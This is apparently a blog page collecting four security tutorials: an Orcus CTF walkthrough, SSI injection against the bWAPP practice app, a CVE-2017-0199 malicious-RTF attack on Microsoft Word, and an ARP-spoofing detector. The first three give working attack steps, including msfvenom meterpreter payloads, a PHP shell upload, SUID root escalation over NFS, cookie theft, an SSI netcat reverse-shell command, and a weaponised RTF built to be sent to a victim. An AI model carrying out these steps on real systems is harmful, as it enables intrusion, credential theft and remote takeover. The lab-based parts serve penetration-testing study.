Hack the Orcus VM CTF Challenge

Hello friends! Today again we are here with a new vulnerable hub challenge “ORCUS” design by Mr. Viper. Through this article we are sharing our work efforts which we have utilize to complete the challenge so that we can catch the flag and beat the goal of this VM machine. This machine contains 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box.

You can download it from here.

 Let’s Breach!! is the trget ip now as we know that enumeration must be the first step for gathering information of any victim so therefore I had used version scan through namp.

nmap -p- -sV

From screenshot you can see there are so many open ports but I will go with port 80.

Since port 80 was opened therefore I had explore target IP in the browser but here I didn’t get any remarkable thing.

Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories open the terminal and type following:


Awesome! We have stepped up in right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “backups” directories. So now I will go with backups directory.

In browser I explored as URL, where I found a tar file “simple PHP Quiz-backup.tar.gz”. Without taking more time I just download it for further enumeration.

So after unzip when I open it I found php and html files inside it, keeping eyes on php files I choose db-conn.php for fetching more details in hop to get something related to database.

Finally after making many efforts I found database username and password as dbuser: dbpasswords respectively.

In dirb brute force attack we have found many directories once again if you will scroll up you will notice phpmyadmin directory in the above given screenshot. Now again I will move towards browser to explore in URL. Form given below screenshot you can observe I had entered above username and password here.

When you will give correct login credential it will allow you to login inside phpmyadmin page. From screenshot you can see I have successfully login inside it using above credential, here I found a database “zenphoto” and decided to move inside it for further details.

Now inside zenphoto I found a setup page which will update the configuration file for the database inside web server when we will fill the information in the given text field.

Here only we need to provide database username i.e. dbuser and database password i.e. dbpassword

Without disturbing other fields click on save which will start database zenphoto installation.

This will start installation when you will click on go tab given at the end of the page. The zenphoto setup will start installing theme and plug-in for your database after that you have to set your admin user and password.

Further click on given tab I agree to these terms and condition.

Now type name for new user as admin  and typepassword: password and confirm password as shown in below image and then click on apply tab given at the top 

Then login into zenphoto database using credential as admin: password. So now we are inside admin console where we have decided to upload an image but here we upload any zip file only.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost= lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will paste it inside text document and saved with shell.php after that create a new folder copy shell.php inside it and compress it.

 Most important thing is to start multi handler inside metasploit.

Then come back to the Browser to upload your zip file, now browse your file and click on upload. Then explore following url, from given image you can see our shell.php is successfully uploaded now click on it.

When you will click on shell.php you will get meterpreter session inside metasploit. Now type following command in order to catch the flag.

Meterpreter >cd /var/www

Meterpreter >ls

Meterpreter >cat flag.txt

 Congrats! We have caught 1st flag.

After so many efforts I found a folder kippo then I step towards it for more information.

Meterpreter >pwd

Meterpreter >cd ..

Meterpreter >cat etc/kippo/data/userdb.txt

 Finally! Caught 2nd flag also.

Now for root privilege escalation open a text document and following: reference



Then save it as raj.c on the desktop.

Now upload raj.c file for compiling and gain root access as shown in following image.

Meterpreter >upload/root/Desktop/raj.c

Meterpreter >shell

gcc -o raj raj.c

Since we know from the nmap’s result nfs port was open in targeted IP so taking advantage of it we will mount tmp ‘s data in url Kali Linux. Now create a folder mount data inside it.

mount -t nfs mount

Chown root: root raj

Chmod u+s raj



Cd /root

Cat flag.txt

Grate!! We have Caught 3rd flag also.

Now try yourself to find out one more flag.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Server Side Injection Exploitation in bWapp

In this article you will learn how to exploit any server using server side include injection which is commonly known as SSI.

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. 

For more information visit owasp.org

 Let’s begin

In your kali Linux open the target IP in browser: Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select server side include injection now and click on hack

Now request web page will get open where you can see it is having two text fields for first name and last name respectfully.

Then I had given random name test: test as the first name and last name respectfully, to know what exactly I will receive when I will click on lookup tab. Here first name text filed is vulnerable to SSI injection.

when I clicked on lookup, a new wep page pop up on the window screen which was showning the IP of my Kali Linux.

Now I will try to exploit this vulnerability by sending different types of malicious code into web application.  If you will see following screenshot carefully here I had sent a script which will generate an alert prompt in window screen. To perform this you need to modify text field of first name and type following code inside it.


So when again we will click on lookup then an alert prompt “hack” will pop up in the window screen. Hence it confirms that first name text filed is vulnerable.

If I am willing to fetch cookies of the web server then this can be possible here also. Only we need to type following script code in the same text filed.


Now again an alert prompt will pop up with server’s cookie, which we can use for further exploitation.

Using exec directive we can execute a server side command with cmd as parameters. Here I am trying to retrieve all lists of files and folder using following code.

<!–#exec cmd=”ls -a” –>

Wonderful!!  So you can see without making proper compromise to the server we have got all present directories inside it.

Now at last finally we will try to access its remote shell using netcat which will help us for establishing a reverse connection with targeted system. Open a terminal to start netcat listener on port 4444 and type following inside vulnerable text filed as done above.

<!–#exec cmd=”nc 4444 -e /bin/bash” –>

So when again you will click on lookup tab you will get reverse connection through netcat shell  as I have received in following image which means the web application server is hacked where we can execute following command to penetrate more and more.



Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Exploit Windows 10 PC with Microsoft RTF File (CVE-2017-0199)

Microsoft word is vulnerable against malicious RTF file, in this article we had made a zero day attack on MS- word 2013 using python script which will generate a malicious .rtf file and give meterpreter session of targeted system.

Exploit toolkit CVE-2017-0199 – v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / any other payload to victim without any complex configuration.

Let’s start!!!

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007 – 2013)

Open the terminal inside your kali Linux and type following to down this script.

Git clone https://github.com/bhdresh/CVE-2017-0199.git

Cd CVE-2017-0199

python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u

This command will run a python script to generate a rich text format payload where –M is used for generating rtf file –w is used for name of rtf file i.e. “sales.rtf” and –u for attacker’s IP address or domain name.

As you can figure out in the given screenshot that above command has generated a malicious sales .rtf file, now before we send this file to our victim we need to connect it with any backdoor file so that we can establish reverse connect with victim.

On a new terminal use msfvenom to prepare an exe payload for attack and type following.

Msfvenom –p windows/meterpreter/reverse_tcp lhost= lport=4444 –f exe > /root/Desktop/raj.exe

Now move raj.exe into /var/www/html.

Now type following command where it will merge raj.exe with sales.rtf. Then you have to share the updated rtf file with victim and start multi handler simultaneously for reverse connection of victims.

python cve-2017-0199_toolkit.py -M exp -e -l /var/www/html/raj.exe

When victim will open sales file which will be in doc format in that mean time attacker will receive his meterpreter ssession inside metasploite framework.

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

How to Detect Sniffer in Your Network using shARP

This article is written to introduce a new lunch tool shARP is an anti-ARP-spoofing program and uses active scanning process to identify any ARP-spoofing event.

ARP spoofing allows an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks. Our anti- ARP spoofing program, (shARP) detects the presence of a third party in a private network actively. It has 2 mode: defensive and offensive.

Defensive mode protects the end user from the spoofer by disconnecting the user’s system from the network and alerts the user by an audio message.

Offensive mode disconnects the user’s system from the network and further kicks out the attacker by sending de-authentication packets to his system, unable him to reconnect to the network until the program is manually reset.

The program creates a log file (/usr/shARP/) containing the details of the attack such as, the attackers Mac address, Mac vendor time and date of the attack. We can identify the NIC of the attackers system with the help of the obtained Mac address. If required the attacker can be permanently banned from the network by feeding his Mac address to the block list of the router.

Let’s start!

Open the terminal in kali Linux and type following command to download it

Git clone https://github.com/europa502/shARP.git

If the user wants to secure his network by scanning for any attacker he can run the program. The program offers a simple command line interface which makes it easy for the new users. Now type following command to run this program:

 Chmod 777 shARP.sh

./sharp.sh -h

Then we had used zanti for sniffing in the network and start MIMT attack on selected target IP: so that we can view its network traffic.

When the user runs the program in defensive mode, As soon as the program detects a spoofer in the network, and it disconnects the user’s system from the network so as to protect the private data being transferred between the system and the server. It also saves a log file about the attacker for further use.

 ./sharp.sh –d eth0

From screenshot you can the highlighted text is showing the Mac address of android phone try to perform spoofing.

Now when it finds spoofing in the network, it disconnects the user from the network. From screenshot you can see now user is assign only its localhost IP.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...